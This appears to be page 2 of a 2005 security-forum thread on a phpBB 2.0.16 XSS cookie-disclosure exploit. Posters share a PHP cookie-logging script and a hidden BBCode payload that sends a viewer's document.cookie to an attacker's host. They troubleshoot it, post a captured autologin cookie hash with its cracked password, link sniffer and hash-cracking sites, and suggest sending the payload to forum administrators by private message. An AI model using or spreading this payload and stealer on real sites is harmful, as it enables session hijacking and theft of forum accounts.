Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 19, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 467
Members: 0
Total: 467
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit Goto page Previous  1, 2, 3, 4, 5, 6, 7, 8  Next
Post new topic  Reply to topic View previous topic :: View next topic 
PostPosted: Sun Jul 10, 2005 1:05 pm Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>

how about this one ?
rename it to cookies.php

and try to access it by http://mysite.com/cookies.php
and see what you have inside http://mysite.com/cookies.txt

;0
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 1:14 pm Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




using the code above.. rename it to cookies.php.. or what ever you want.


Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


have fun
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 1:15 pm Reply with quote
verbatim
Regular user
Regular user
 
Joined: Jul 09, 2005
Posts: 11




when i call http://mysite.com/cookies.php
there's in cookies.txt :
Code:
Cookie: <br> IP: [color=#FF0000]myIP[/color]<br> Date and Time: 10 July, 2005, 3:11 pm<br> Referer: <br><br><br>


but when i try to use the exploit with this new cookies.php :
Quote:
[url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookies.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'


the cookies.txt is empty Sad

edit : i tried the syntax you gave while i was posting :

Code:
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]




An now it's working, great job subzero, i'd say you're certainly above (zero Wink).
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 1:30 pm Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




Good then

only diff for that code was cookies.php?c=

happy hunting ;P pal
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 2:25 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




Ok i have something like this


REFERER=http://www.site.net/nothing/phpBB2/viewtopic.php?t=2
QUERY=phpbb2mysql_t=a:2:{i:1;i:1121004937;i:2;i:1121005196;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c2150783216c11afea291d179e7b1902";s:6:"userid";s:1:"2";}; phpbb2mysql_sid=b57ae9f7898f1ccebf7e07fa427e5998
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

now what ? by what program/viewer i can use this cookie ?


c2150783216c11afea291d179e7b1902 is md5 hash ?


Last edited by WaterBird on Sun Jul 10, 2005 2:39 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 2:37 pm Reply with quote
verbatim
Regular user
Regular user
 
Joined: Jul 09, 2005
Posts: 11




the password of this user : dupa400
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 2:40 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




verbatim wrote:
the password of this user : dupa400



Yea i know i just testing the exploit is there any posibilyty to do a jpg cookie stiller ? So i don;t have to use

http://www.antichat.ru/sniff/log.php
and
http://antichat.ru/cgi-bin/s.jpg

?? Any ideas ?
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 2:51 pm Reply with quote
verbatim
Regular user
Regular user
 
Joined: Jul 09, 2005
Posts: 11




a "jpg cookie stealer" can't exist, because jpg is no executable... i presume antichat.ru redirectq (with .htaccess) http://antichat.ru/cgi-bin/s.jpg to the real stealer script.

if you want to use your own stealer script, you just have to read my discussion with subzero, the answer is in. Wink
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 2:57 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




verbatim wrote:
a "jpg cookie stealer" can't exist, because jpg is no executable... i presume antichat.ru redirectq (with .htaccess) http://antichat.ru/cgi-bin/s.jpg to the real stealer script.

if you want to use your own stealer script, you just have to read my discussion with subzero, the answer is in. Wink



Yep i have try that one my cookie is empty !

Done the php file with

Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>


in same directory/path created empty cookies.txt file with CHMOD 777

and in post i add

Code:

[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.site.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]


And when i see the post on admin account file cookies.txt is still empty. Any ideas ?
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 3:10 pm Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




i think you using mozilla ?? others than IE ?

i have no problem to see my own hash and im sure verbatism dont have problem too Wink

about the hash pass.

found an online site that do cracking for u.
http://sarcaprj.wayreth.eu.org/
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 3:13 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




subzero wrote:
i think you using mozilla ?? others than IE ?

i have no problem to see my own hash and im sure verbatism dont have problem too Wink

about the hash pass.

found an online site that do cracking for u.
http://sarcaprj.wayreth.eu.org/



Thx for hash pass cracker but i still don't understand why this php don;t wan't to work i have entered it by typing the url in to my ie and i get:

Code:

Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@site.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.


Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


--------------------------------------------------------------------------------

Apache/1.3.33 Server at www.site.com Port 80





server nfo

Code:

Operating system   FreeBSD   
Service Status   Click to View   
Kernel version   4.11-STABLE   
Machine Type   i386   
Apache version   1.3.33 (Unix)   
PERL version   5.8.5   
Path to PERL   /usr/bin/perl   
Path to sendmail   /usr/sbin/sendmail   
Installed Perl Modules   Click to View   
PHP version   4.3.10   
MySQL version   4.0.18   
cPanel Build   10.2.0-CURRENT 89   
Theme   cPanel X v2.5.0    
Documentation   Click to View   
cPanel Pro   1.0 (RC26)
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 3:32 pm Reply with quote
subzero
Valuable expert
Valuable expert
 
Joined: Mar 16, 2005
Posts: 42




Code:

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>


rename to cookies.php

and make new one cookies.txt

with chmod 777 inside the same directory.
i put mine in root directory /

mmm good luck.
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 3:52 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




ok i have put this php file in root directory and it's working thx :}
Btw to all intrested maybe you know it but you don't have to post in topic or do a new one you can just send a msg to admin and paste the code in the msg :}

Cheers and thx for help !! Many thx !
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 5:39 pm Reply with quote
WaterBird
Active user
Active user
 
Joined: May 16, 2005
Posts: 37




Btw any idea how to fix this hole ? Phpbb don't know about it yet ?
View user's profile Send private message
PostPosted: Sun Jul 10, 2005 5:48 pm Reply with quote
700G
Active user
Active user
 
Joined: Mar 25, 2005
Posts: 33




Works very good Very Happy
View user's profile Send private message
phpBB 2.0.16 XSS Remote Cookie Disclosure Exploit
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 2 of 8  
Goto page Previous  1, 2, 3, 4, 5, 6, 7, 8  Next
  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.180 Seconds